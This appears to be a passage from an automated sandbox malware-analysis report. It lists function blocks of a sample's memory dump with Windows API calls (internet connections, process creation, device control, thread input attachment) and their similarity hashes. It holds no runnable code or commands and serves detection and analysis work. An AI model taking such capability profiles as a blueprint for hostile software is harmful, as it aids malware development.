                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 25db18495ef8a3b1f742cf2ceefd79ab587ff289ef8983f322b4500417c4a5b6
                    • Instruction ID: 18e2faa2a0215919d556f5ac9bea4ef976ee24994b9902c3b2d42c8790727404
                    • Opcode Fuzzy Hash: 25db18495ef8a3b1f742cf2ceefd79ab587ff289ef8983f322b4500417c4a5b6
                    • Instruction Fuzzy Hash: 0E21A171D01208EFCF00DF94D948BEEB7B8EF42340F084099E454A7241DB38AE05CB61
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B1A97
                      • Part of subcall function 007B1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B1B40
                      • Part of subcall function 007B1B21: InternetCloseHandle.WININET(00000000), ref: 007B1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 136814334b6ba9d54334adfb2a0cb4f7e314647f3d7e7c3b7be0677be75c664d
                    • Instruction ID: 82792e92d6b3896807e0be86c3bed831afdbfb104e76af5b89f2b9a15b60d3ed
                    • Opcode Fuzzy Hash: 136814334b6ba9d54334adfb2a0cb4f7e314647f3d7e7c3b7be0677be75c664d
                    • Instruction Fuzzy Hash: B821D171201600BFDB119F608C18FFBB7AEFF48700F90401AFA0196661EB39E8219BA4
                    APIs
                      • Part of subcall function 0079F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0079E1C4,?,?,?,0079EFB7,00000000,000000EF,00000119,?,?), ref: 0079F5BC
                      • Part of subcall function 0079F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0079F5E2
                      • Part of subcall function 0079F5AD: lstrcmpiW.KERNEL32(00000000,?,0079E1C4,?,?,?,0079EFB7,00000000,000000EF,00000119,?,?), ref: 0079F613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0079EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0079E1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 0079E203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0079EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0079E237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 716cd08da0f2996f184baa1be9c6b13f338e4cf53a5e46e5dd356fad8da7f89b
                    • Instruction ID: 3daf5ae5318726750f9c52111e84d44463980de629f6eb55913fdee4792acf5f
                    • Opcode Fuzzy Hash: 716cd08da0f2996f184baa1be9c6b13f338e4cf53a5e46e5dd356fad8da7f89b
                    • Instruction Fuzzy Hash: C811AC36200245EFCF25AF64E849E7A77A9FF84310B44802AE806CB260EB79D85187A4
                    APIs
                    • _free.LIBCMT ref: 00775351
                      • Part of subcall function 0076594C: __FF_MSGBANNER.LIBCMT ref: 00765963
                      • Part of subcall function 0076594C: __NMSG_WRITE.LIBCMT ref: 0076596A
                      • Part of subcall function 0076594C: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000000,?,?,?,00761013,?), ref: 0076598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 4f2f426649c9b06dab2e681618cd6aca8f7c7477aa23c99fcb5ed192f91cdcaf
                    • Instruction ID: 5e42b18469a07a81debafe31f7d94ce7ebf41b64585e1847b153d73e9528dd84
                    • Opcode Fuzzy Hash: 4f2f426649c9b06dab2e681618cd6aca8f7c7477aa23c99fcb5ed192f91cdcaf
                    • Instruction Fuzzy Hash: 07119432604A15EECF212F70AC496593B94AF153E4F10862AFD4A961B1DBFD89409661
                    APIs
                    • _memset.LIBCMT ref: 00744560
                      • Part of subcall function 0074410D: _memset.LIBCMT ref: 0074418D
                      • Part of subcall function 0074410D: _wcscpy.LIBCMT ref: 007441E1
                      • Part of subcall function 0074410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007441F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 007445B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007445C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0077D6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: f267a83dfa9f88815ec7c4271f9faafe5ba804f6233d74bf281089efeef3c994
                    • Instruction ID: 7df043445d0906c8004bf9fd05ab79b406b0b73c1b0b92bdb6d3a98b61a0e016
                    • Opcode Fuzzy Hash: f267a83dfa9f88815ec7c4271f9faafe5ba804f6233d74bf281089efeef3c994
                    • Instruction Fuzzy Hash: 4921C270904784AFEF328B249859BE7BBECAF01348F04409EE69E96281C77C5E949B51
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007A40D1
                    • _memset.LIBCMT ref: 007A40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007A4144
                    • CloseHandle.KERNEL32(00000000), ref: 007A414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: f499394b5cddf7acc9c154a58843676d7be129c5a99e6896843a6154b2675ac8
                    • Instruction ID: 39c27562ab47db2eebd46248b6d7757ad50ec2f3c8b8f574687a64adf9f1219a
                    • Opcode Fuzzy Hash: f499394b5cddf7acc9c154a58843676d7be129c5a99e6896843a6154b2675ac8
                    • Instruction Fuzzy Hash: 9311CD7590122CBAD7305BA59C4DFABBB7CEF85760F1042DAF908D7180D6744E84CBA4
                    APIs
                      • Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7B20,?,?,00000000), ref: 00745B8C
                      • Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7B20,?,?,00000000,?,?), ref: 00745BB0
                    • gethostbyname.WSOCK32(?), ref: 007B66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B66B7
                    • _memmove.LIBCMT ref: 007B66E4
                    • inet_ntoa.WSOCK32(?), ref: 007B66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: adf94f281a4731fe6de65218ec650c5a30b4f6252c391fe0b838e2dbcde9ff99
                    • Instruction ID: ad248c78cf9b84b9a42a4978ae4085ed26107bb303971c39b84bffca28c25b01
                    • Opcode Fuzzy Hash: adf94f281a4731fe6de65218ec650c5a30b4f6252c391fe0b838e2dbcde9ff99
                    • Instruction Fuzzy Hash: 44116075500509EFCF00EBA4DD8ADEEB7B9EF44310B148169F602A7262DF38AE04CB61
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00799043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00799055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00799086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: e3722dbe89a1302faa954764fa9e3fc6126f9d4cd1af7e18371f17f0cad8b5dd
                    • Instruction ID: b39901bfb8d28c8efbc25143fd1186a1a38644925ececa353c76752a95c9c4af
                    • Opcode Fuzzy Hash: e3722dbe89a1302faa954764fa9e3fc6126f9d4cd1af7e18371f17f0cad8b5dd
                    • Instruction Fuzzy Hash: 43114C79901219FFEF10DFA9CD84EADBB74FB48310F204095EA14B7250D6726E10DB94
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 007412D8
                    • GetClientRect.USER32(?,?), ref: 0077B84B
                    • GetCursorPos.USER32(?), ref: 0077B855
                    • ScreenToClient.USER32(?,?), ref: 0077B860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: b431a5a1d272982e91794927272e8188b988dbe40d44c1b6be276427b64aa9ff
                    • Instruction ID: c77063db669665edc4901cc3214cb83a643e95975e715fad8770b132bbe16868
                    • Opcode Fuzzy Hash: b431a5a1d272982e91794927272e8188b988dbe40d44c1b6be276427b64aa9ff
                    • Instruction Fuzzy Hash: 0B112835A00119EFCB00EF94D889DFE77B9FB05301F40445AFA11E7151D778AAA1CBA9
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,007A01FD,?,007A1250,?,00008000), ref: 007A16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 62f04605c4595e56679eb5c187fea0be70a44ca90a790f3e2a0c902f6b442962
                    • Instruction ID: 474f8f49fd513a95e15ff8858d87ab01ca6f48eecd8c33015d5dd231f6668cff
                    • Opcode Fuzzy Hash: 62f04605c4595e56679eb5c187fea0be70a44ca90a790f3e2a0c902f6b442962
                    • Instruction Fuzzy Hash: F2117C31C0191CDBDF009FA5D848AEEBB78FF4A711F49819AE940F2240CF3895608BDA
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 98cb650a2b01869feabb8e380e114efbd1f55ca825365066dcf8ba4276fa3273
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: F701403614414AFBCF1A5E84CC458EE3F72BF59391B588525FA2C98032D63BC9B1EB81
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 007CB59E
                    • ScreenToClient.USER32(?,?), ref: 007CB5B6
                    • ScreenToClient.USER32(?,?), ref: 007CB5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007CB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: d102a054c36addc374f7ff2c95d61e1d36de5dd4ea6b762e8d30d876eaf7f502
                    • Instruction ID: 1c75c841e6cf48826f286e13128986b6a699e24853afe4280d608b1c485ae63b
                    • Opcode Fuzzy Hash: d102a054c36addc374f7ff2c95d61e1d36de5dd4ea6b762e8d30d876eaf7f502
                    • Instruction Fuzzy Hash: 321146B5D00209EFDB41CF99D444AEEFBB5FB08310F10816AE954E3220D735AA658F54
                    APIs
                    • _memset.LIBCMT ref: 007CB8FE
                    • _memset.LIBCMT ref: 007CB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00807F20,00807F64), ref: 007CB93C
                    • CloseHandle.KERNEL32 ref: 007CB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 74e675c67c67d885790674d6ad6795c24be7077965792346ba0829475b59eef1
                    • Instruction ID: 2fad0ccc65ea16fef66cf250ce04a9a8ce2e6b48d046948b6565d10b41ce5c80
                    • Opcode Fuzzy Hash: 74e675c67c67d885790674d6ad6795c24be7077965792346ba0829475b59eef1
                    • Instruction Fuzzy Hash: 08F05EB2948341BBE2502761AC0AFBB3B5DFB08354F004025FB08E61A2DF79690487A8
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 007A6E88
                      • Part of subcall function 007A794E: _memset.LIBCMT ref: 007A7983
                    • _memmove.LIBCMT ref: 007A6EAB
                    • _memset.LIBCMT ref: 007A6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 007A6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: aaf7627902f3265ea59f92ff649e95dc2fac21bab9daac6dce4b56294d3b8925
                    • Instruction ID: b7c3ecfa44d4ec5384754d6cc381090e61b38fdf2630ccf7526f1e58e4a883a3
                    • Opcode Fuzzy Hash: aaf7627902f3265ea59f92ff649e95dc2fac21bab9daac6dce4b56294d3b8925
                    • Instruction Fuzzy Hash: 65F0543A104200EBCF416F55DC89E4ABB2AEF45320B04C065FE095E226C735A911CBB5
                    APIs
                      • Part of subcall function 007412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
                      • Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074135C
                      • Part of subcall function 007412F3: BeginPath.GDI32(?), ref: 00741373
                      • Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CC030
                    • LineTo.GDI32(00000000,?,?), ref: 007CC03D
                    • EndPath.GDI32(00000000), ref: 007CC04D
                    • StrokePath.GDI32(00000000), ref: 007CC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 37aeb21c089969fdca95389306b63901c3155620bb97a69daa67283a36125605
                    • Instruction ID: db9237979d7c5d9f5dd0af28cb71ebf73e8b75c8ead8222316237adcde0ab908
                    • Opcode Fuzzy Hash: 37aeb21c089969fdca95389306b63901c3155620bb97a69daa67283a36125605
                    • Instruction Fuzzy Hash: E6F05E31101259FBDB126F54AC0AFCE3F5ABF05711F148018FA15610E287B955A1DB99
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079A399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0079A3AC
                    • GetCurrentThreadId.KERNEL32 ref: 0079A3B3
                    • AttachThreadInput.USER32(00000000), ref: 0079A3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
